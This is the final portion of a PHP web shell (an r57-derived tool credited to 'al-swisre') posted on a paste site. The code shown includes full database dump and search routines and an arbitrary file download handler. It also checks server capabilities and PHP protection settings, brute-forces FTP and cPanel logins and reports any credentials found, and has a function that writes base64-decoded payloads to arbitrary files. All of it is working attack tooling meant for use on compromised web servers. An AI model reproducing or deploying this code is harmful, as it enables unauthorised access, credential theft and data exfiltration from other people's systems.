  3486.     while($row = @mysql_fetch_row($result))
  3487.     {
  3488.       $tables[] = $row[0];
  3489.     }
  3490.   }
  3491.   else
  3492.   {
  3493.     $tables = is_array($tables) ? $tables : explode(',',$tables);
  3494.   }
  3495.  
  3496.   //cycle through
  3497.   foreach($tables as $table)
  3498.   {
  3499.     $result = mysql_query('SELECT * FROM '.$table);
  3500.     $num_fields = mysql_num_fields($result);
  3501.  
  3502.        $row2 = mysql_fetch_row(mysql_query('SHOW CREATE TABLE '.$table));
  3503.        $return.= "\n\n".$row2[1].";\n\n";
  3504.  
  3505.     for ($i = 0; $i < $num_fields; $i++)
  3506.     {
  3507.       while($row = mysql_fetch_row($result))
  3508.       {
  3509.         $return.= 'INSERT INTO '.$table.' VALUES(';
  3510.         for($j=0; $j<$num_fields; $j++)
  3511.         {
  3512.           $row[$j] = addslashes($row[$j]);
  3513.           $row[$j] = ereg_replace("\n","\\n",$row[$j]);
  3514.           if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
  3515.           if ($j<($num_fields-1)) { $return.= ','; }
  3516.         }
  3517.         $return.= ");\n";
  3518.       }
  3519.     }
  3520.     $return.="\n\n\n";
  3521.   }
  3522.  
  3523.   //save file
  3524.   $handle = @fopen($path,'w+');
  3525.   @fwrite($handle,$return);
  3526.   @fclose($handle);
  3527. }
  3528.  
  3529. function search($string){
  3530.     $q = mysql_query("SHOW TABLE STATUS");
  3531.     $data = array();
  3532.     while($table = mysql_fetch_array($q)){
  3533.         $query = "SELECT * FROM $table[Name]";
  3534.         $result = mysql_query($query);
  3535.         $row = @mysql_fetch_assoc($result);
  3536.         if(!$row){
  3537.             continue;
  3538.         }
  3539.         $columns = array_keys($row);
  3540.         $data[$table['Name']] = $columns;
  3541.     }
  3542.     $tables = array();
  3543.     foreach($data as $table=>$columns){
  3544.         $query = "SELECT * FROM `$table` WHERE ";
  3545.         foreach($columns as $key=>$column){
  3546.             if($key == 0){
  3547.                 $query .= "`$column` LIKE '%$string%'";
  3548.             }else{
  3549.                 $query .= " OR `$column` LIKE '%$string%'";
  3550.             }
  3551.         }
  3552.         $query = mysql_query($query);
  3553.         $result = mysql_num_rows($query);
  3554.         if($result > 0){
  3555.             $tables[] = $table;
  3556.         }
  3557.     }
  3558.     $founded = array();
  3559.     foreach($tables as $table){
  3560.         $columns = $data[$table];
  3561.         foreach($columns as $column){
  3562.             $query = "SELECT * FROM `$table` WHERE `$column` LIKE '%$string%'";
  3563.             $query = mysql_query($query);
  3564.             $result = mysql_num_rows($query);
  3565.             if($result > 0){
  3566.                 $founded[] = array('table'=>$table,'column'=>$column);
  3567.             }
  3568.         }
  3569.     }
  3570.     return $founded;
  3571. }
  3572.  
  3573.     function cleandir($d){ // Function to clean up the $dir and $curdir variables
  3574.     $d = @realpath($d);
  3575.     $d = str_replace("\\\\", "\\", $d);
  3576.     $d = str_replace("////", "//", $d);
  3577.     return($d);
  3578. }
  3579.  
  3580. function wsoPermsColor($f) {
  3581.         if (!@is_readable($f))
  3582.                 return '<font color=#FF0000>' . @wsoPerms(@fileperms($f)) . '</font>';
  3583.         elseif (!@is_writable($f))
  3584.                 return '<font color=white>' . @wsoPerms(@fileperms($f)) . '</font>';
  3585.         else
  3586.                 return '<font color=#25ff00>' . @wsoPerms(@fileperms($f)) . '</font>';
  3587. }
  3588.  
  3589. function wsoPerms($p) {
  3590.         if (($p & 0xC000) == 0xC000)$i = 's';
  3591.         elseif (($p & 0xA000) == 0xA000)$i = 'l';
  3592.         elseif (($p & 0x8000) == 0x8000)$i = '-';
  3593.         elseif (($p & 0x6000) == 0x6000)$i = 'b';
  3594.         elseif (($p & 0x4000) == 0x4000)$i = 'd';
  3595.         elseif (($p & 0x2000) == 0x2000)$i = 'c';
  3596.         elseif (($p & 0x1000) == 0x1000)$i = 'p';
  3597.         else $i = 'u';
  3598.         $i .= (($p & 0x0100) ? 'r' : '-');
  3599.         $i .= (($p & 0x0080) ? 'w' : '-');
  3600.         $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
  3601.         $i .= (($p & 0x0020) ? 'r' : '-');
  3602.         $i .= (($p & 0x0010) ? 'w' : '-');
  3603.         $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
  3604.         $i .= (($p & 0x0004) ? 'r' : '-');
  3605.         $i .= (($p & 0x0002) ? 'w' : '-');
  3606.         $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
  3607.         return $i;
  3608. }
  3609.  
  3610. function perm($file)
  3611. {
  3612.  if(file_exists($file))
  3613.  {
  3614.   return @substr(@sprintf('%o', @fileperms($file)), -4);
  3615.  }
  3616.  else
  3617.  {
  3618.   return "????";
  3619.  }
  3620. }
  3621.  
  3622. function sa_download($path)
  3623.         {
  3624.         header('Content-Description: File Transfer');
  3625.     header('Content-Type: application/octet-stream');
  3626.     header('Content-Disposition: attachment; filename='.basename($path));
  3627.     header('Content-Transfer-Encoding: binary');
  3628.     header('Expires: 0');
  3629.     header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
  3630.     header('Pragma: public');
  3631.     header('Content-Length: ' . filesize($path));
  3632.     ob_clean();
  3633.     flush();
  3634.     readfile($path);
  3635.     exit;
  3636.         }
  3637.  
  3638.     function findit($mytext,$starttag,$endtag) {
  3639.  $posLeft  = @stripos($mytext,$starttag)+strlen($starttag);
  3640.  $posRight = @stripos($mytext,$endtag,$posLeft+1);
  3641.  return  @substr($mytext,$posLeft,$posRight-$posLeft);
  3642. }
  3643.  
  3644. function MsSQL()
  3645. {
  3646.         if(@function_exists('mssql_connect'))
  3647.         {
  3648.                 $msSQL = '<font color="red">ON</font>';
  3649.         }
  3650.         else
  3651.         {
  3652.                 $msSQL = '<font color="green">OFF</font>';
  3653.         }
  3654.         return $msSQL;
  3655. }
  3656. function MySQL2()
  3657. {
  3658.         $mysql_try = @function_exists('mysql_connect');
  3659.         if($mysql_try)
  3660.         {
  3661.                 $mysql = '<font color="red">ON</font>';
  3662.         }
  3663.         else
  3664.         {
  3665.                 $mysql = '<font color="green">OFF</font>';
  3666.         }
  3667.         return $mysql;
  3668. }
  3669. function Gzip()
  3670. {
  3671.         if (@function_exists('gzencode'))
  3672.         {
  3673.                 $gzip = '<font color="red">ON</font>';
  3674.         }
  3675.         else
  3676.         {
  3677.                 $gzip = '<font color="green">OFF</font>';
  3678.         }
  3679.         return $gzip;
  3680. }
  3681. function MysqlI()
  3682. {
  3683.         if (@function_exists('mysqli_connect'))
  3684.         {
  3685.                 $mysqli = '<font color="red">ON</font>';
  3686.         }
  3687.         else
  3688.         {
  3689.                 $mysqli = '<font color="green">OFF</font>';
  3690.         }
  3691.         return $mysqli;
  3692. }
  3693. function MSQL()
  3694. {
  3695.         if (@function_exists('msql_connect'))
  3696.         {
  3697.                 $mSql = '<font color="red">ON</font>';
  3698.         }
  3699.         else
  3700.         {
  3701.                 $mSql = '<font color="green">OFF</font>';
  3702.         }
  3703.         return $mSql;
  3704. }
  3705. function PostgreSQL()
  3706. {
  3707.         if(@function_exists('pg_connect'))
  3708.         {
  3709.                 $postgreSQL = '<font color="red">ON</font>';
  3710.         }
  3711.         else
  3712.         {
  3713.                 $postgreSQL = '<font color="green">OFF</font>';
  3714.         }
  3715.         return $postgreSQL;
  3716. }
  3717.  
  3718. function Oracle()
  3719. {
  3720.         if(@function_exists('ocilogon'))
  3721.         {
  3722.                 $oracle = '<font color="red">ON</font>';
  3723.         }
  3724.         else
  3725.         {
  3726.                 $oracle = '<font color="green">OFF</font>';
  3727.         }
  3728.         return $oracle;
  3729. }
  3730.  
  3731.  
  3732. function RegisterGlobals()
  3733. {
  3734.         if(@ini_get('register_globals'))
  3735.         {
  3736.                 $registerg= '<font color="red">ON</font>';
  3737.         }
  3738.         else
  3739.         {
  3740.                 $registerg= '<font color="green">OFF</font>';
  3741.         }
  3742.         return $registerg;
  3743. }
  3744. function HardSize($size)
  3745. {
  3746.         if($size >= 1073741824)
  3747.         {
  3748.                 $size = @round($size / 1073741824 * 100) / 100 . " GB";
  3749.         }
  3750.         elseif($size >= 1048576)
  3751.         {
  3752.                 $size = @round($size / 1048576 * 100) / 100 . " MB";
  3753.         }
  3754.         elseif($size >= 1024)
  3755.         {
  3756.                 $size = @round($size / 1024 * 100) / 100 . " KB";
  3757.         }
  3758.         else
  3759.         {
  3760.                 $size = $size . " B";
  3761.         }
  3762.         return $size;
  3763. }
  3764. function Curl()
  3765. {
  3766.         if(extension_loaded('curl'))
  3767.         {
  3768.                 $curl = '<font color="red">ON</font>';
  3769.         }
  3770.         else
  3771.         {
  3772.                 $curl = '<font color="green">OFF</font>';
  3773.         }
  3774.         return $curl;
  3775. }
  3776.  
  3777. function magicQouts()
  3778. {
  3779.         $mag=get_magic_quotes_gpc();
  3780.         if (empty($mag))
  3781.         {
  3782.                 $mag = '<font color="green">OFF</font>';
  3783.         }
  3784.         else
  3785.         {
  3786.                 $mag= '<font color="red">ON</font>';
  3787.         }
  3788.         return $mag;
  3789. }
  3790.  
  3791. function openBaseDir()
  3792. {
  3793. $openBaseDir = @ini_get("open_basedir");
  3794. if (!$openBaseDir)
  3795.     {
  3796.                 $openBaseDir = '<font color="green">OFF</font>';
  3797.         }
  3798.     else
  3799.         {
  3800.                 $openBaseDir = '<font color="red">ON</font>';
  3801.         }
  3802.         return $openBaseDir;
  3803. }
  3804.  
  3805. function ftp_check($host,$user,$pass,$timeout){
  3806. $ch = curl_init();
  3807. curl_setopt($ch, CURLOPT_URL, "ftp://$host");
  3808. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3809. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  3810. curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  3811. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  3812. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  3813. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  3814. $data = curl_exec($ch);
  3815. if ( curl_errno($ch) == 28 ) {
  3816.  
  3817. print "<b> Error : Connection timed out </b>";
  3818. exit;}
  3819.  
  3820. elseif ( curl_errno($ch) == 0 ){
  3821.  
  3822. print
  3823. "
  3824. <b>found username : <font color='#FF0000'> $user </font> - password :
  3825. <font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);
  3826. exit;}
  3827.  
  3828.  
  3829. function cpanel_check($host,$user,$pass,$timeout){
  3830. $ch = curl_init();
  3831. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  3832. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3833. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  3834. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  3835. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  3836. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  3837. $data = curl_exec($ch);
  3838. if ( curl_errno($ch) == 28 ) {
  3839. print "<b> Error : Connection timed out</b>";
  3840. exit;}
  3841. elseif ( curl_errno($ch) == 0 ){
  3842.  
  3843. print
  3844. "
  3845. <b>found username : <font color='#FF0000'>$user</font> - password :
  3846. <font color='#FF0000'>$pass </font></b><br>"; }curl_close($ch);
  3847. exit; }
  3848.  
  3849.  
  3850.                 function op_sa($f,$t) {
  3851.                         $w = @fopen($f,"w") or @function_exists('file_put_contents');
  3852.                         if($w){
  3853.                                 @fwrite($w,@base64_decode($t));
  3854.                                 @fclose($w);
  3855.                         }
  3856.                 }
  3857.  
  3858.  
  3859.   echo "</td></tr></table></div> |<b class='foter'>Progr4m3r by <a href='$pg?sws=ab'>al-swisre Edited: r57.gen.tr</a></b>|<b class='foter'>E-m4il : <a href='#'>oy3@hotmail.com</a></b>|<b class='foter'>r57 shell : <a target='_blank' href='http://r57.gen.tr'>r57 shell</a></b>| </html> ";
  3860.  
  3861.  
  3862.  
  3863. ?>
clone this paste RAW Paste Data